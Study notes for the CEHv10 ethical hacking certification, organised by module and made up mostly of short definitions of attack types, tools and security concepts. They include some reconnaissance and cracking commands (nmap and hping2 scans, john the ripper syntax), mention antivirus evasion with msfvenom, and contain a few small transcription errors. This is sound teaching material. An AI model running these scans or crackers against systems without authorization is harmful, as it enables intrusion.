CEHv10 Module 01 Introduction to

Ethical Hacking
 We will start defining
● Program bugs
● Buffer overflows
● Viruses
● Worms
● Trojan Horses
● Denial of Service
● Social Engineering
 Different methods used to
● Footprinting
Attack:
● Scanning
● Enumeration
● Penetration – (Individuals that are unsuccessful at this step may opt
for a Denial of Service attack)
● Escalation of Privilege
● Cover Tracks
● Backdoors
 The Security Functionality
Triangle
The CIA triangle or triad comprises the three fundamental pillars of
security. These include:
●Confidentiality
●Integrity
●Availability
 Different Types of Attacks
● LAN Attack
● WAN Attack
● Physical Entry
● Stolen Equipment
● Unsecured Wireless Access
● DialUp Attack
 Security evaluation plan

It is a very important part at the time of making an audit, it requires a

document in which is the client's authorization, the rules of the game
and scope. it consists of the following:

1. Authorized signature of the client to perform the auditing.

2. How and when is the audit carried out?
3. What would be the scope of the audit that can be accessed and that
can not be accessed?
 Type of tests

● Internal Evaluations
● External Evaluations
● Stolen Equipment Evaluations
 Ethical Hacking Report

● Preparation
● Result
● Conclusion
 Penetration test
methodologies
1. AsseE among other assessment
2. Policy
3. Implementation
4. Training
5. Audit
CEHv10 Module 02 Footprinting and
Reconnaissance
 Footprinting
Most important phase of testing – very time consuming
 Footprinting tools
Steps for gathering information Some of the most well-known tools
used for information gathering include:
● WHOIS
● Nslookup
● Web-Based Tools
 WHOIS
WHOIS allows you to query the information an organization entered
when they registered their domain.
 Nslookup
Nslookup is employed to query domain name servers. A nslookup
query can be used to resolve IP addresses to hostnames.
Many web-based tools are available to help you get hidden domain
information. These services provide whois information, DNS
information, and network queries.
 IANA
IANA is an excellent starting point for determining details about a domain.
RIR’s (Regional Internet Registries)
These databases provide an excellent resource to use to research a
domain further, once you have decided what area of the world it is
located in.
 Domain Location and Path
Discovery:
If you are unsure of a domain’s location, the best way to determine its
position is by use of the traceroute command. Traceroute identifies a
path to a domain by incrementing the TTL field of the IP header.
Reconnaissance
The first step in security testing
Google hacking may be employed
CEHv10 Module 03
Scanning
 Identification Processes
There are numerous ways that this identification process can take place
that includes:
1. War Dialing
2. War Driving
3. Pinging
4. Port Scanning
 War Dialing
While some may see war dialing as a dated art, it still has its place in the
hacker’s arsenal of tools. If a thorough footprint has been performed,
phone numbers were most likely found that can be associated with the
organization.
 War Driving
This mode of penetration relies on identifying unsecured wireless access
points.
 ICMP Ping
Ping is an ICMP (Internet Control Message Protocol) echo request-
response
 No ping response???
ICMP could be disabled on the target – try a TCP ping instead
 Port Scanning
Port scanning allows a hacker to determine what all services are running
on the system. Identification of vulnerable or insecure services let the
hacker to exploit unauthorized access.
 TCP Scan Types
1. Ping Scan
2. SYN Scan
3. Full Scan
4. ACK Scan
5. XMAS SCAN
6. UDP Basics
 Nmap
Nmap (network mapper) is an open source port scanner that can craft packets in
numerous ways allowing the program to determine what services an OS is running.
Find out what ports are open
OS Scan requires root privileges
nmap -T4 -F 10.10.0.0/24 – enumerates machines quickly
nmap -sV host.domain.com -p 80 – attempts banner grabbing
nmap -sS -sU -Pn -p 1-65535 192.168.1.1 – scans udp
To save time, ping sweep to identify live hosts and then port scan the live hosts.
 Port Scan Countermeasures
Practice the principle of providing least privilege. Don’t leave ports open and block ICMP
echo requests at the firewall or external router. Allow traffic through the external router
to only specific hosts.
 Active Stack Fingerprinting
Active stack fingerprinting relies on subtle differences in the responses to specially crafted
packets.
 Nessus or another vulnerability
scanner
Is one of the best approaches for discovering vulnerabilities on a Windows-based
computer
Shows missing patches and weak passwords
Determining the attack surface of
an organization
Run a scan to detect network services in the corporate DMZ
XMAS, FIN, NULL scans
The port will ignore the packets if the port is open
RST if port is closed
TCP three way handshake connection
establishment and
termination
Connection Establishment: SYN, SYN-ACK, ACK
Connection Termination: FIN, ACK-FIN, ACK
 Banner grabbing

HTTP/1.1 200 OK Server: MIcrosoft IIS/6 Expires Wed, 26

Feb 2013 01:41:33 GMT Date: Wed, 26 Feb 2013 02:06:13 GMT Content-Type: text/html Accept-
Ranges: bytes
Last-Modified: Wed, 26 Feb 2013 13:12:11 GMT ETag: “50ba0543e25c31:89d" Content-Length:
8156
 Netcraft
This is a handy site for legitimate and illegitimate purposes. Its most used feature is that it
shows how long a particular site has been up and what the site is running
 Telnet
Telnet can easily be used for banner grabbing from various applications simply by
specifying the target and port.
TCP SYN scanning
Will not evade IDS
TOR network with multi-node
Surf the internet anonymously
 Log of Port scan targeting
172.17.17.206
Time:Mar 13 17:30:15 Port 20 Source:172.17.17.203 Destination 172.17.17.206 Protocol TCP
Time Mar 13 17:30:17 Port 21 Source: 172.17.17.203 Destination: 172.17.17.206 Protocol TCP
Time Mar 1317 :30 ;19 Port 22 Source 172.17.17.203 Destination: 172.17.17.206 Protocol TCP
Time: Feb 29 13:21:31 Port23 Source 172.17.17.203 Destination 172.17.17.206 Protocol TCP
Time Feb 29 13:21:32 Port 25 Source 172.17.17.203 Destination 172.17.17.206 Protocol TCP
Time Feb 29 13:21:33 Port 80 Source 172.17.17.203 Destination 172.17.17.206 Protocol TCP
Time Feb 29 13:21:30 Port 443 Source 172.17.17.203 Destination172.17.17.206 Protocol TCP
 Active OS fingerprinting
sends specially crafted packets to the remote OS and analyzes the
received response
ICMP scan using hping2
hping2 -1 host.domain.com
Xmas scan using NMAP
nmap -sX 10.0.0.254
CEHv10 Module 04 Enumeration
 Enumeration

Enumeration is the process of discovering each domain that is located within the LAN.
 Port and services
135 - MS-RPC Endmapper
137 - NetBIOS Name Service
138 - NetBIOS Datagram Service
139 - NetBIOS Session Service
445 - SMB over TCP / IP (Windows 2K and above)
 NetBIOS Null Sessions
The legitimate purpose of a Null Session is to grant unauthenticated
computers to obtain browse lists from servers, permit system accounts
access to network resources, or to allow a null session pipe.
The Inter-Process
Communication Share
Windows computers make communications with each other over the
IPC$ “Inter-Process Communication” share.
515, 631 and 9100
515 is Line Printer Daemon (LPD)
631 is Internet Printing Protocol (IPP)
9100 HP Jet Direct
This host is most likely a printer
net view
Lists file shares
AXFR or IXFR
DNS zone transfers
CEHv10 Module 05 System Hacking
 System hacking
System Hacking - System hacking is the point at which an actual connection is made. It is
the first true attack phase, breaking and entering by an attacker using the administrative
connection or by an enumerated share.
Maintain Access
Create User Account
Install backdoor
Password Cracking
Dictionary – least time and effort
Brute force – most time and effort
 LM Hash
The maximum password length is 14 characters
No case sensitivity
 Steganography
Hiding a covert message within an overt message
Security through obscurity
 CHNTPW
Linux based tool to change any Windows user's password or to activate
disabled accounts
Counter-based authentication
system
creates secret key encrypted one-time passwords
Password crackers
John the ripper
Hydra
Rainbowcrack
Lophtcrack
Cain
Using john the ripper
Basic syntax is: john passwordfile.txt
 /etc/passwd
Does not contain the passwords themselves. The shadow file does.
Pwdump SAM file hash dump
format
USER:RID:LM:NTLM
Dictionary attack
Uses a list of commonly used passwords
 Salting
Defeats rainbow tables
 Privilege Escalation
Vertical - acquiring administrative privileges
Horizontal – acquiring access to another account's files
Multi-factor authentication
Something you remember – password or pin
Something you have – smart card or token
Something you are - biometric
Rainbow Table Attack
Uses a precomputed table of hashed passwords
Shellshock
Doesn’t affect Windows
 USB Dumper
Dumps files from USB devices without alerting the user.
CEHv10 Module 06 Malware
Threats
 Boot Sector Virus
Copies itself to the original location of the MBR after relocating the original to another
location on the disk
 Ransomware
Locks your computer and demands payment to unlock it.
Botnet Trojans
Send junk mail
Participate in coordinated attacks
Host unauthorized content
 User Access Control (UAC)
Prevents a user from accidentally executing a potentially malicious program
 Tunneling virus
Actively alters and corrupts service call interruptions
 DEP
Blocks execution in a non-executable memory location
Macro virus
Infects Microsoft Office files
CEHv10 Module 07 Sniffing
 Hosts file
Can be used for DNS poisoning to direct the user to a phishing site
Encryption Protocols
Best defense against sniffing
 Syslog
Uses UDP port 514
Wireshark filters
ip.src
ip.dst
tcp.port
tcp.srcport
tcp.dstport
 tcptrace
Used to analyze packet capture files
 ARP
Sends a broadcast for the MAC address from a specific IP address.
 Sniffers
Work at Layer 2 and Layer 3 of the OSI model.
Can be used to read PCAP files from IDS’s or other utilities.
Wireshark is a very popular sniffer for both wired and wireless traffic
Tcpdump is a popular command line packet sniffer
 Promiscuous mode
Passes all traffic to the CPU vs. only traffic to the local MAC address or broadcasts
Application layer vulnerabilities
Are identical in IPv6 and IPv4
STP manipulation
redirects traffic to attacker’s computer
 Network routers
Protocols should be configured with authentication
 DNSSEC
Provides authentication of DNS traffic
CEHv10 Module 08 Social
Engineering
Social engineering
low-tech methods
Piggybacking / Tailgating
Following someone closely through a secure entrance
Click jacking attack
a transparent iframe in front of the URL
 Pharming
modifying host configuration files or exploiting DNS
 Phishing
URL misspelled or similar to the actual domain name
Dumpster diving
Looking for useful information in the trash
CEHv10 Module 09 Denial-of-
Service
 Denial of Service
A DoS attack is a special type of attack that brings a system offline compromised
or otherwise makes a host’s service unavailable to legitimate users.
 Common DoS Attack
Popular DoS attacks can be separated into three categories:
1. Bandwidth
2. Protocol
3. Logic
 Common DoS Strategies:
● Ping of Death
● SSPing
● Land
● Smurf
● SYN Flood
● Win Nuke
● Jolt2
● Bubonic
● Targa
● Teardrop
 DDoS Attack Sequence
● Mass Intrusion
● Attack Phase
 Preventing DoS Attacks

No solution provides complete protection against the threat of DoS attacks. However,
there are things you can do to minimize the effect of a DoS attack
 DoS Scanning Tools

● Find_ddos
● SARA
● DDoSPing
● RID
● Zombie Zapper
 DoS and DDoS
Denial of Services (DoS) and Distributed Denial of Service (DDoS) attacks are
embarrassing and inconvenient. Both attacks are extremely difficult to prevent from being
attempted. The best defense is a well-designed network that is hard to overwhelm.
CEHv10 Module 10 Session
Hijacking
 Spoofing
Spoofing is an act of masquerading or impersonating as another user, whereas session
hijacking tries to attack and take over an existing connection.
 Session Hijacking
Session hijacking attacks can range differently from basic sniffing, to capture the traffic of
an authenticated traffic between a client and server, to hijacking the established session
to fool the server into thinking it has an authenticated session with the server.
 Session Hijacking Steps
1. The attacker must be able to track and intercept the traffic
2. The attacker must be able to desynchronize the connection
3. The attacker must be able to inject his traffic in place of the victim’s
 Types of Hijacking:
● Passive Session Hijacking
● Active Session Hijacking
● TCP Concepts
 TCP
TCP must set up the session. This setup is comprised of three steps.

Client -- SYN -→ Server Client ←- SYN / ACK -- Server Client -- ACK -→ Server
 IPSec
Operates at Layer 3
Transport mode is used on the LAN
Tunnel mode is used on the internet (VPNs)
ESP provides confidentiality
AH provides authenticity
CEHv10 Module 11 Hacking
Webservers
 Hacking Web Servers
Web hacking is an important topic because much of the Internet is devoted to e-
commerce.
 Web Server Identification
While standard web servers run on ports 80 (HTTP) or 443 (HTTPS), there are similar ports
that should be scanned while looking for web-based applications. These include the
following ports:
● 88 – Kerberos
● 2779 - Windows 2000 Web Server
● 8080 – Squid
● 8888 – Alternate Web Server
 Web Server Scanning Tools
● Nmap
● Netscan Tools
● Superscan
 Web Server Enumeration
Once all the possible web servers have been discovered, the attacker will usually
attempt to enumerate the web server vendor.
 Vulnerability Identification
Once the attacker has identified the vendor and version of the web server, he will then
search for vulnerabilities.
 Vulnerability Exploitation:
IIS has been noticed to be the target of many attacks, but this is partly because it is so
widely used. Others such as Apache, have also been targeted for attack and have their
share of vulnerabilities.
 Types of Web Server Attacks:
● ISAPI DLL Buffer Overflows
● IPP Printer Overflow
● Directory Listing
● Shoveling the Shell
NMAP http-methods script
Can detect all http methods (GET, POST, HEAD, PUT, DELETE, TRACE)
Msfencode / msfvenom
Can help evade AV
Metasploit
Exploitation framework
CEHv10 Module 12 Hacking Web
Applications
 Attacking Web Application Server
Web servers typically listen on TCP port 80 (HTTP) and TCP port 443 (HTTPS). Because
those ports must be open and available to web clients, any firewalls or packet filtering
devices between the web client and web server must pass traffic destined for those ports.
Web application software sits on top of the web server software and allows access to
additional ports
 Basic Attacks Steps for Web
Application Server
Hacking web applications is similar to hacking other systems. Hackers follow a five-step
process:
● Scan the network
● Gather information
● Test different attack scenarios
● Planning the attack
● Launch an attack
 Injection
#1 on the OWASP Top Ten List
 Nikto
Web vulnerability scanner
 Insufficient input validation
A software design problem where unexpected input can be entered into an application
Burpsuite
Web proxy tool
XSS prevention
Input validation
Escape input
Simple Object Access Protocol
(SOAP)
Provides a structured model for messaging
Based on XML
Exchanges data between web services
CEHv10 Module 13 SQL Injection
 SQL Injection
SQL injection occurs when an attacker can insert SQL statements into a query using a SQL
injection vulnerability.
 SQL Injection Vulnerabilities
1. Unpatched Systems
2. Blank SA Password
 Single quote
Used to attempt to breaking a valid SQL request
Blind SQLi
Generic error page
True/False questions
Time delay
CEHv10 Module 14 Hacking
Wireless Networks
 Wireless Attacks
● Wireless DoS
● Access Point Spoofing
 Kismet
Wireless detection tool
 Wireless Intrusion Prevention
System
Used to detect and restrict network access to unauthorized wireless devices, also capable
of searching for and locating rogue access points
 RADIUS
Authentication, Authorization, and Accounting (AAA) server
Used in 802.1x authentication
Bluetooth
short-range wireless
Wired Equivalent Privacy (WEP)
Can be attacked by capturing enough packets to crack the key in seconds
 MAC filtering
WAP must recognize the client’s MAC address as being authorized to connect
Bluetooth attacks
Bluesnarfing
Bluejacking
Bluesmacking
Bluebugging
 Aircrack-ng
802.11 WEP and WPA cracking tool
 Evil twin attack
Access point that appears to be a legitimate set up to eavesdrop on wireless
communications.
WPA2
AES 128 bit
CCMP
CEHv10 Module 15 Hacking Mobile
Platforms
BBProxy
Blackjacking tool
CEHv10 Module 16 Evading IDS,
Firewalls, and Honeypots
 Whisker
Web vulnerability scanner with session splicing capabilities
Bastion host
Facilitates separation of duties
IDS evasion
Encryption
Flooding
Unicode Characters
Stateful inspection firewall
Verifies packets belong to an established session
Application firewall
Capable of inspecting content
 IDS rule example
alert tcp any any -> 10.0.0.0/24 23 (msg: “Telnet traffic";)
Intrusion Detection System
Identifies malicious activities
 False Negative
No alarm is triggered when one should be triggered
 Cryptcat
Allows for encrypted passing of data over the network
Network based intrusion detection
system (NIDS)
Monitors all network traffic
ideal for observing sensitive network segments
 Firewalking
Determines which ports are open and if the packets can pass
through the packet filter and the firewall

Receipt of “Time-to-live exceeded” message indicates port was not blocked at firewall
 False positive
Alarm is triggered when one should not be triggered
CEHv10 Module 17 Cloud
Computing
 Cloud Computing
Cloud Computing is an on-demand delivery of IT where IT infrastructure
and applications are provided to subscribers as a metered services over
a network.capabilities
Characteristics of Cloud Computing
1. On-demand self service.
2. Distributed storage.
3. Rapid elasticity.
4. Automated management.
5. Broad network access.
6. Resource pooling.
7. Measured service.
8. Virtualization technology.
CEHv10 Module 18 Cryptography
 RSA
Uses product of two large prime numbers
 PKI
Designed to verify and authenticate the identity of individuals
XOR
1 XOR 1=0
1 XOR 0=1
0 XOR 1=1
0 XOR 0=0
 Heartbleed
Serious vulnerability in OpenSSL (TLS/SSL)
Exposes private key of the server
Collision attack
Two inputs producing the same hash
Public Key (Asymmetric)
PGP
SSL
IKE
RSA
 Hash
Insures integrity of data
 TLS
Successor to SSL
 Disk Encryption
Best protection against data compromise in the event of physical theft of the device.
 SSL
asymmetric key pair is used to deliver the shared session key
Private Key (Symmetric)
Faster than Asymmetric
AES
DES
RC4
 Digital signature
Hash of the document encrypted with the private key of the signer
Certificate Authority (CA)
Vouches for the identity of an individual or company
 CEHv10 Module 19 Ethics,
Process, General Knowledge
Risk equation
Risks = Threats x Vulnerabilities
 Backup tapes
Most secure retention method is an offsite location
Host command
host -t a targetdomain.org
 Risk
Can never be fully eliminated, but can be reduced to acceptable levels
Physical security
Should be considered in a risk assessment
 Shellshock
GNU bash shell vulnerability often exploited through a malformed environment variable
Five basic responses to risk
accept
avoid
mitigate
share
transfer
 Vulnerability scanner
May be used to audit compliance with security policies
Time synchronization
Ensures log file event correlation is accurate
 Threat
An entity or event with the potential to adversely impact a system
 Residual risk
Risk that remains after the vulnerabilities are classified and the
countermeasures have been deployed
compmgmt.msc
Launches Computer
Management Console
If you encounter evidence of a
crime:
Immediately stop and contact law enforcement
 Sandbox
A restricted OS for testing code
 Application Layer
Responsible for moving and processing data between tiers
If you discover a vulnerability
Notify the web site owner
 Single sign-on
Permits users to authenticate once and gain access to multiple systems
 Biometric processing speed
The time it takes to be accepted or rejected from when an individual provides
identification and authentication information
 Civil liability
Executives are liable for not reasonably protecting company's assets in information
systems
 Digital signature
Must be authentic and incapable of being forged
 deny tcp any any
permit tcp any any
All tcp traffic would be blocked since the first rule applies and others are disregarded
 Stateful firewall
A security solution which filters data packets
 PCI compliance
Use a firewall between the public network and the payment card data
Limit access to card holder data to as few individuals as possible
Use encryption to protect all transmission of card holder data over any public network
 C++
Most susceptible to buffer overflows
Monitoring Employees
Employees must be informed that they are being monitored
 Likelihood
The probability that a threat-source will exploit a vulnerability
To verify that a backup can
be restored
Perform a full restore
 CEHv10 Module 20
Performing a Penetration
Test
 Defining Security
Assessments
A penetration tester assesses the security posture of the organization as a whole
to reveal the potential consequences of a real attacker compromising a network or
application. Security assessments can be categorized as security audits,
vulnerability assessments, or penetration testing.
Penetration Testing Steps
Penetration testing includes three phases:
● Preattack phase
● Attack phase
● Postattack phase
CEHv10 Module 21 IoT
Security
 IoT Security
IoT Security is key for the secure development and secure operation of scalable IoT
applications and services that connect the real and virtual worlds between objects,
systems, and people.
 IoT Introduces an Increased
Number of Security Threats
One of the big differences between the Internet of Things and previous internet
technology is that the number of possible threats is much larger.
 IoT Security Happens on Four
Different Layers
IoT solution architectures require multi-layered security approaches that seamlessly work
together to provide complete end-to-end security from device to cloud and everything in
between throughout the lifecycle of the solution.
 Increasing Automation of IoT
Security Tasks
With forecasted growth to billions of IoT devices, manually handling security tasks (e.g.,
revoking certificates, isolating compromised devices), as is still the case in many solutions
today, will not be feasible.
END